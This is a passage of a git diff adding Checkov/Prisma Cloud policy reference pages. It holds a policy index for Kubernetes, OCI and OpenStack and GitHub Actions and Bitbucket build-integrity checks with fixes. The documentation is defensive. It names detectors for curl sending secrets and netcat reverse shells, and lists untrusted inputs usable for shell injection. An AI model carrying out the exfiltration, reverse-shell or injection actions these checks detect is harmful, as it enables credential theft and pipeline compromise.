+    file: kubernetes-policy-index.adoc
+  - name: Containers wishing to share host process ID namespace admitted
+    file: bc-k8s-1.adoc
+  - name: CPU limits are not set
+    file: bc-k8s-10.adoc
+  - name: Memory requests are not set
+    file: bc-k8s-11.adoc
+  - name: Memory limits are not set
+    file: bc-k8s-12.adoc
+  - name: Image tag is not set to Fixed
+    file: bc-k8s-13.adoc
+  - name: Image pull policy is not set to Always
+    file: bc-k8s-14.adoc
+  - name: Container is privileged
+    file: bc-k8s-15.adoc
+  - name: Containers share host process ID namespace
+    file: bc-k8s-16.adoc
+  - name: Containers share host IPC namespace
+    file: bc-k8s-17.adoc
+  - name: Containers share the host network namespace
+    file: bc-k8s-18.adoc
+  - name: Containers run with AllowPrivilegeEscalation
+    file: bc-k8s-19.adoc
+  - name: Privileged containers are admitted
+    file: bc-k8s-2.adoc
+  - name: Default namespace is used
+    file: bc-k8s-20.adoc
+  - name: Read-Only filesystem for containers is not used
+    file: bc-k8s-21.adoc
+  - name: Admission of root containers not minimized
+    file: bc-k8s-22.adoc
+  - name: Containers with added capability are allowed
+    file: bc-k8s-23.adoc
+  - name: Admission of containers with added capability is not minimized
+    file: bc-k8s-24.adoc
+  - name: hostPort is specified
+    file: bc-k8s-25.adoc
+  - name: Mounting Docker socket daemon in a container is not limited
+    file: bc-k8s-26.adoc
+  - name: Admission of containers with NET_RAW capability is not minimized
+    file: bc-k8s-27.adoc
+  - name: securityContext is not applied to pods and containers in container context
+    file: bc-k8s-28.adoc
+  - name: seccomp is not set to Docker/Default or Runtime/Default
+    file: bc-k8s-29.adoc
+  - name: Containers wishing to share host IPC namespace admitted
+    file: bc-k8s-3.adoc
+  - name: seccomp profile is not set to Docker/Default or Runtime/Default
+    file: bc-k8s-30.adoc
+  - name: Kubernetes dashboard is deployed
+    file: bc-k8s-31.adoc
+  - name: Tiller (Helm V2) is deployed
+    file: bc-k8s-32.adoc
+  - name: Secrets used as environment variables
+    file: bc-k8s-33.adoc
+  - name: Admission of containers with capabilities assigned is not limited
+    file: bc-k8s-34.adoc
+  - name: Service account tokens are not mounted where necessary
+    file: bc-k8s-35.adoc
+  - name: CAP_SYS_ADMIN Linux capability is used
+    file: bc-k8s-36.adoc
+  - name: Containers do not run with a high UID
+    file: bc-k8s-37.adoc
+  - name: Default service accounts are actively used
+    file: bc-k8s-38.adoc
+  - name: Images are not selected using a digest
+    file: bc-k8s-39.adoc
+  - name: Containers wishing to share host network namespace admitted
+    file: bc-k8s-4.adoc
+  - name: Tiller (Helm V2) deployment is accessible from within the cluster
+    file: bc-k8s-40.adoc
+  - name: Tiller (Helm v2) service is not deleted
+    file: bc-k8s-41.adoc
+  - name: Root containers admitted
+    file: bc-k8s-5.adoc
+  - name: Containers with NET_RAW capability admitted
+    file: bc-k8s-6.adoc
+  - name: Liveness probe is not configured
+    file: bc-k8s-7.adoc
+  - name: Readiness probe is not configured
+    file: bc-k8s-8.adoc
+  - name: CPU request is not set
+    file: bc-k8s-9.adoc
+  - name: Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations are not minimized
+    file: ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc
+  - name: Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests are not minimized
+    file: ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc
+  - name: Containers run with AllowPrivilegeEscalation based on Pod Security Policy setting
+    file: ensure-containers-do-not-run-with-allowprivilegeescalation.adoc
+  - name: Default Kubernetes service accounts are actively used by bounding to a role or cluster role
+    file: ensure-default-service-accounts-are-not-actively-used.adoc
+  - name: Wildcard use is not minimized in Roles and ClusterRoles
+    file: ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc
+  - name: Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings are not minimized
+    file: ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc
+  - name: Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole are not minimized
+    file: ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc
+  - name: securityContext is not applied to pods and containers
+    file: ensure-securitycontext-is-applied-to-pods-and-containers.adoc
+  - name: The admission control plugin AlwaysAdmit is set
+    file: ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc
+  - name: The admission control plugin AlwaysPullImages is not set
+    file: ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc
+  - name: The admission control plugin EventRateLimit is not set
+    file: ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc
+  - name: The admission control plugin NamespaceLifecycle is not set
+    file: ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc
+  - name: The admission control plugin NodeRestriction is not set
+    file: ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc
+  - name: The admission control plugin PodSecurityPolicy is not set
+    file: ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc
+  - name: The admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used
+    file: ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc
+  - name: The admission control plugin ServiceAccount is not set
+    file: ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc
+  - name: The --anonymous-auth argument is not set to False for API server
+    file: ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc
+  - name: The --anonymous-auth argument is not set to False for Kubelet
+    file: ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc
+  - name: The API server does not make use of strong cryptographic ciphers
+    file: ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc
+  - name: The --audit-log-maxage argument is not set appropriately
+    file: ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc
+  - name: The --audit-log-maxbackup argument is not set appropriately
+    file: ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc
+  - name: The --audit-log-maxsize argument is not set appropriately
+    file: ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc
+  - name: The --audit-log-path argument is not set
+    file: ensure-that-the-audit-log-path-argument-is-set.adoc
+  - name: The --authorization-mode argument does not include node
+    file: ensure-that-the-authorization-mode-argument-includes-node.adoc
+  - name: The --authorization-mode argument does not include RBAC
+    file: ensure-that-the-authorization-mode-argument-includes-rbac.adoc
+  - name: The --authorization-mode argument is set to AlwaysAllow for Kubelet
+    file: ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc
+  - name: The --authorization-mode argument is set to AlwaysAllow for API server
+    file: ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc
+  - name: The --auto-tls argument is set to True
+    file: ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc
+  - name: The --basic-auth-file argument is Set
+    file: ensure-that-the-basic-auth-file-argument-is-not-set.adoc
+  - name: The --bind-address argument is not set to 127.0.0.1
+    file: ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc
+  - name: The --bind-address argument for controller managers is not set to 127.0.0.1
+    file: ensure-that-the-bind-address-argument-is-set-to-127001.adoc
+  - name: The --cert-file and --key-file arguments are not set appropriately
+    file: ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc
+  - name: The --client-ca-file argument for API Servers is not set appropriately
+    file: ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc
+  - name: The --client-cert-auth argument is not set to True
+    file: ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc
+  - name: The --etcd-cafile argument is not set appropriately
+    file: ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc
+  - name: Encryption providers are not appropriately configured
+    file: ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc
+  - name: The --etcd-certfile and --etcd-keyfile arguments are not set appropriately
+    file: ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc
+  - name: The --event-qps argument is not set to a level that ensures appropriate event capture
+    file: ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc
+  - name: The --hostname-override argument is set
+    file: ensure-that-the-hostname-override-argument-is-not-set.adoc
+  - name: The --insecure-bind-address argument is set
+    file: ensure-that-the-insecure-bind-address-argument-is-not-set.adoc
+  - name: The --insecure-port argument is not set to 0
+    file: ensure-that-the-insecure-port-argument-is-set-to-0.adoc
+  - name: The --kubelet-certificate-authority argument is not set appropriately
+    file: ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc
+  - name: The --kubelet-client-certificate and --kubelet-client-key arguments are not set appropriately
+    file: ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc
+  - name: The --kubelet-https argument is not set to True
+    file: ensure-that-the-kubelet-https-argument-is-set-to-true.adoc
+  - name: Kubelet does not use strong cryptographic ciphers
+    file: ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc
+  - name: The --make-iptables-util-chains argument is not set to True
+    file: ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc
+  - name: The --peer-cert-file and --peer-key-file arguments are not set appropriately
+    file: ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc
+  - name: The --peer-client-cert-auth argument is not set to True
+    file: ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc
+  - name: The --profiling argument is not set to False for scheduler
+    file: ensure-that-the-profiling-argument-is-set-to-false-1.adoc
+  - name: The --profiling argument is not set to false for API server
+    file: ensure-that-the-profiling-argument-is-set-to-false-2.adoc
+  - name: The --profiling argument for controller managers is not set to False
+    file: ensure-that-the-profiling-argument-is-set-to-false.adoc
+  - name: The --protect-kernel-defaults argument is not set to True
+    file: ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc
+  - name: The --read-only-port argument is not set to 0
+    file: ensure-that-the-read-only-port-argument-is-set-to-0.adoc
+  - name: The --request-timeout argument is not set appropriately
+    file: ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc
+  - name: The --root-ca-file argument for controller managers is not set appropriately
+    file: ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc
+  - name: The --rotate-certificates argument is set to false
+    file: ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc
+  - name: The RotateKubeletServerCertificate argument for controller managers is not set to True
+    file: ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc
+  - name: The --secure-port argument is set to 0
+    file: ensure-that-the-secure-port-argument-is-not-set-to-0.adoc
+  - name: The --service-account-key-file argument is not set appropriately
+    file: ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc
+  - name: The --service-account-lookup argument is not set to true
+    file: ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc
+  - name: The --service-account-private-key-file argument for controller managers is not set appropriately
+    file: ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc
+  - name: The --streaming-connection-idle-timeout argument is set to 0
+    file: ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc
+  - name: The --terminated-pod-gc-threshold argument for controller managers is not set appropriately
+    file: ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc
+  - name: The --tls-cert-file and --tls-private-key-file arguments for Kubelet are not set appropriately
+    file: ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc
+  - name: The --tls-cert-file and --tls-private-key-file arguments for API server are not set appropriately
+    file: ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc
+  - name: The --token-auth-file argument is Set
+    file: ensure-that-the-token-auth-file-parameter-is-not-set.adoc
+  - name: The --use-service-account-credentials argument for controller managers is not set to True
+    file: ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc
+  - name: Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation
+    file: granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc
+  - name: Admission of containers with capabilities assigned is not minimised
+    file: minimize-the-admission-of-containers-with-capabilities-assigned.adoc
+  - name: No ServiceAccount/Node should be able to read all secrets
+    file: no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc
+  - name: No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts
+    file: no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc
+  - name: NGINX Ingress has annotation snippets
+    file: prevent-all-nginx-ingress-annotation-snippets.adoc
+  - name: NGINX Ingress has annotation snippets which contain alias statements
+    file: prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc
+  - name: NGINX Ingress annotation snippets contains LUA code execution
+    file: prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc
+  - name: RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding
file: rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc + - name: ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster + file: serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc +--- +kind: chapter +name: OCI Policies +dir: oci-policies +topics: +- name: OCI Policies + file: oci-policies.adoc +- name: Compute + dir: compute + topics: + - name: Compute + file: compute.adoc + - name: OCI Compute Instance boot volume has in-transit data encryption disabled + file: ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc + - name: OCI Compute Instance has Legacy MetaData service endpoint enabled + file: ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc +- name: IAM + dir: iam + topics: + - name: IAM + file: iam.adoc + - name: OCI IAM password policy for local (non-federated) users does not have a minimum length of 14 characters + file: oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc + - name: OCI IAM password policy for local (non-federated) users does not have a lowercase character + file: oci-iam-password-policy-must-contain-lower-case.adoc + - name: OCI IAM password policy for local (non-federated) users does not have a number + file: oci-iam-password-policy-must-contain-numeric-characters.adoc + - name: OCI IAM password policy for local (non-federated) users does not have a symbol + file: oci-iam-password-policy-must-contain-special-characters.adoc + - name: OCI IAM password policy for local (non-federated) users does not have an uppercase character + file: oci-iam-password-policy-must-contain-uppercase-characters.adoc +- name: Logging + dir: logging + topics: + - name: Logging + file: logging.adoc + - name: OCI Compute Instance has monitoring disabled + file:
ensure-oci-compute-instance-has-monitoring-enabled.adoc +- name: Networking + dir: networking + topics: + - name: Networking + file: networking.adoc + - name: OCI Network Security Groups (NSG) has stateful security rules + file: ensure-oci-security-group-has-stateless-ingress-security-rules.adoc + - name: OCI security groups rules allows ingress from 0.0.0.0/0 to port 22 + file: ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc + - name: OCI Security Lists with Unrestricted traffic to port 22 + file: ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc + - name: OCI security list allows ingress from 0.0.0.0/0 to port 3389 + file: ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc + - name: OCI VCN has no inbound security list + file: ensure-vcn-has-an-inbound-security-list.adoc + - name: OCI VCN Security list has stateful security rules + file: ensure-vcn-inbound-security-lists-are-stateless.adoc +- name: Secrets 1 + dir: secrets-1 + topics: + - name: Secrets 1 + file: secrets-1.adoc + - name: OCI private keys are hard coded in the provider + file: bc-oci-secrets-1.adoc +- name: Storage + dir: storage + topics: + - name: Storage + file: storage.adoc + - name: OCI Block Storage Block Volume does not have backup enabled + file: ensure-oci-block-storage-block-volume-has-backup-enabled.adoc + - name: OCI File Storage File Systems are not encrypted with a Customer Managed Key (CMK) + file: ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc + - name: OCI Object Storage bucket does not emit object events + file: ensure-oci-object-storage-bucket-can-emit-object-events.adoc + - name: OCI Object Storage Bucket has object Versioning disabled + file: ensure-oci-object-storage-has-versioning-enabled.adoc + - name: OCI Object Storage Bucket is not encrypted with a Customer Managed Key (CMK) + file: ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc + - name: OCI 
Object Storage bucket is publicly accessible + file: ensure-oci-object-storage-is-not-public.adoc + - name: OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) + file: oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc +--- +kind: chapter +name: OpenStack Policies +dir: openstack-policies +topics: +- name: OpenStack Policies + file: openstack-policies.adoc +- name: OpenStack Policy Index + dir: openstack-policy-index + topics: + - name: OpenStack Policy Index + file: openstack-policy-index.adoc + - name: OpenStack Security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) + file: bc-openstack-networking-2.adoc + - name: OpenStack firewall rule does not have destination IP configured + file: ensure-openstack-firewall-rule-has-destination-ip-configured.adoc + - name: OpenStack instance uses basic credentials + file: ensure-openstack-instance-does-not-use-basic-credentials.adoc diff --git a/code-security/policy-reference/build-integrity-policies/bitbucket-policies/bitbucket-policies.adoc b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/bitbucket-policies.adoc new file mode 100644 index 000000000..436263749 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/bitbucket-policies.adoc @@ -0,0 +1,14 @@ +== Bitbucket Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:merge-requests-should-require-at-least-2-approvals-1.adoc[BitBucket pull requests require less than 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/bitbucket/checks/merge_requests_approvals.py[CKV_BITBUCKET_1] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/bitbucket-policies/merge-requests-should-require-at-least-2-approvals-1.adoc
b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/merge-requests-should-require-at-least-2-approvals-1.adoc new file mode 100644 index 000000000..834581b31 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/merge-requests-should-require-at-least-2-approvals-1.adoc @@ -0,0 +1,52 @@ +== BitBucket pull requests require less than 2 approvals +// Bitbucket pull requests require minimum number of approvals + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4fb83a3a-d3ef-43f2-8e11-4feb2a21fd91 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/bitbucket/checks/merge_requests_approvals.py[CKV_BITBUCKET_1] + +|Severity +|MEDIUM + +|Subtype +|Build +// ,Run + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In Bitbucket, repository administrators can require that all pull requests receive a specific number of approving reviews before someone merges the pull request into a protected branch. +If a collaborator attempts to merge a pull request with pending or rejected reviews into the protected branch, the collaborator will receive an error message. + +//// +=== Fix - Runtime + +. Login to Bitbucket + +. Select your repository + +. Select Repository settings + +. Select Branch restrictions + +. Add a restriction + +. Under Merge settings check Minimum number of approvals and select 2 + +.
Save +//// \ No newline at end of file diff --git a/code-security/policy-reference/build-integrity-policies/build-integrity-policies.adoc b/code-security/policy-reference/build-integrity-policies/build-integrity-policies.adoc new file mode 100644 index 000000000..ac74bcaaa --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/build-integrity-policies.adoc @@ -0,0 +1,3 @@ +== Build Integrity Policies + + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc new file mode 100644 index 000000000..9304bb737 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc @@ -0,0 +1,49 @@ +== GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable is set to true +// GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable set to true + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5f535c28-9737-46eb-b505-0471b746c202 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py[CKV_GHA_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + + + +=== Description + + +GitHub Actions (GHA) environment variable flag `ACTIONS_ALLOW_UNSECURE_COMMANDS` allows GHA workflows to run the deprecated `set-env` and `add-path` commands, which should not be used as they expose accounts to potential credential theft or code injection. + +=== Fix - Buildtime + + +*GitHub Actions* + + +Remove `ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'` + +[source,yaml] +---- +... + env: +- ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true' +...
+---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc new file mode 100644 index 000000000..69d945f1d --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc @@ -0,0 +1,65 @@ +== GitHub Actions Run commands are vulnerable to shell injection + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 88bfe6da-4117-4fa0-b542-a450bfc70ebd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ShellInjection.py[CKV_GHA_2] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|GithubActions + +|=== + +=== Description + + + +Avoid passing any of the following untrusted inputs directly into `run:` commands, as an attacker can craft their values to inject arbitrary shell commands.
+https://securitylab.github.com/research/github-actions-untrusted-input/[Source] + +Potentially risky variables include: + +* github.event.issue.title +* github.event.issue.body +* github.event.pull_request.title +* github.event.pull_request.body +* github.event.comment.body +* github.event.review.body +* github.event.review_comment.body +* github.event.pages.*.page_name +* github.event.commits.*.message +* github.event.head_commit.message +* github.event.head_commit.author.email +* github.event.head_commit.author.name +* github.event.commits.*.author.email +* github.event.commits.*.author.name +* github.event.pull_request.head.ref +* github.event.pull_request.head.label +* github.event.pull_request.head.repo.default_branch +* github.head_ref + +=== Fix - Buildtime + + +*GitHub Actions yaml* + + +[source,yaml] +---- +- title="${{ github.event.issue.title }}" +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc new file mode 100644 index 000000000..c4cae25f8 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc @@ -0,0 +1,51 @@ +== GitHub Actions artifact build does not have SBOM attestation in pipeline +// GitHub Actions artifact build does not include SBOM attestation in pipeline + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2e1596ff-56b2-4dde-94fb-60d697500b74 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignSBOM.py[CKV_GHA_6] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Github Actions + +|=== + +=== Description + +Signing SBOMs
ensures that no changes were made to an application between the code and deploy phases. Cosign can be used to sign pipeline artifacts to ensure their integrity and prevent tampering prior to and after deployment. + + +=== Fix - Buildtime + +*Example Fix: Add `cosign attest` or `cosign sign` to sign SBOMs.* + + +There are many ways to do this as a job or step in a GitHub Actions pipeline. +Below is one example for signing an SBOM. + +[source,yaml] +---- ++ run: cosign attest --predicate sbom.json --type https://cyclonedx.org/bom --key env://COSIGN_PRIVATE_KEY ${{ env.IMAGE }} +---- + +OR + +[source,yaml] +---- ++ run: cosign sign --key cosign.key container:sha256-1234.sbom +---- \ No newline at end of file diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-contain-workflow-dispatch-input-parameters.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-contain-workflow-dispatch-input-parameters.adoc new file mode 100644 index 000000000..18784d773 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-contain-workflow-dispatch-input-parameters.adoc @@ -0,0 +1,44 @@ +== GitHub Actions contain workflow_dispatch input parameters +// GitHub Actions contain 'workflow_dispatch' input parameters + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 23d12d24-8e7d-4718-8d34-084429ae7077 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py[CKV_GHA_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description +In GitHub Actions, workflow_dispatch allows you to manually trigger pipelines and enter unique inputs for each run. +While this may be helpful for running different scenarios, it breaks the policy that workflows should be automated and not take user input.
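A compliant trigger declares no `inputs` block, so runs cannot be parameterized by users. A minimal sketch (workflow and job names are illustrative):

```yaml
# Manually triggerable workflow that takes no user input (illustrative names)
name: release
on:
  workflow_dispatch: {}   # no `inputs:` block

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: make build   # build depends only on the checked-out source
```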
+ +=== Fix - Buildtime +*Example Fix* + + +[source,yaml] +---- +on: +  workflow_dispatch: +- inputs: +- ... +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-policies.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-policies.adoc new file mode 100644 index 000000000..ea98a8418 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-policies.adoc @@ -0,0 +1,44 @@ +== Github Actions Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc[GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable is set to true] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py[CKV_GHA_1] +|MEDIUM + + +|xref:ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc[GitHub Actions Run commands are vulnerable to shell injection] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ShellInjection.py[CKV_GHA_2] +|MEDIUM + + +|xref:found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc[GitHub Actions artifact build does not have SBOM attestation in pipeline] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignSBOM.py[CKV_GHA_6] +|LOW + + +|xref:no-evidence-of-signing.adoc[GitHub Actions artifact build does not have cosign sign execution in pipeline] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignArtifacts.py[CKV_GHA_5] +|LOW + + +|xref:suspicious-use-of-curl-with-secrets.adoc[GitHub Actions curl is being used with secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/SuspectCurlInScript.py[CKV_GHA_3] +|LOW + +
+|xref:suspicious-use-of-netcat-with-ip-address.adoc[GitHub Actions Netcat is being used with IP address] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ReverseShellNetcat.py[CKV_GHA_4] +|LOW + + +|xref:github-actions-contain-workflow-dispatch-input-parameters.adoc[GitHub Actions contain workflow_dispatch input parameters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py[CKV_GHA_7] +|LOW + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/no-evidence-of-signing.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/no-evidence-of-signing.adoc new file mode 100644 index 000000000..8aa490bbe --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/no-evidence-of-signing.adoc @@ -0,0 +1,43 @@ +== GitHub Actions artifact build does not have cosign sign execution in pipeline +// GitHub Actions artifact build does not use 'cosign' to sign pipeline artifacts
+ +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3281171a-ff12-4591-a28d-51d888aa58c7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignArtifacts.py[CKV_GHA_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description +Cosign can be used to sign pipeline artifacts, such as container images, to ensure their integrity and prevent tampering prior to and after deployment. +Violating this policy means a signable artifact was discovered but there is no evidence of signing that artifact in your pipeline. + +=== Fix - Buildtime +*Example Fix: Add `cosign sign` to sign artifacts.* + + +There are many ways to do this as a job or step in a GitHub Actions pipeline. +Below is one example for signing a container image. +[source,yaml] +---- ++ run: cosign sign --key env://COSIGN_PRIVATE_KEY ${{ env.IMAGE }} +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-curl-with-secrets.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-curl-with-secrets.adoc new file mode 100644 index 000000000..17028d8b1 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-curl-with-secrets.adoc @@ -0,0 +1,44 @@ +== GitHub Actions curl is being used with secrets +// GitHub 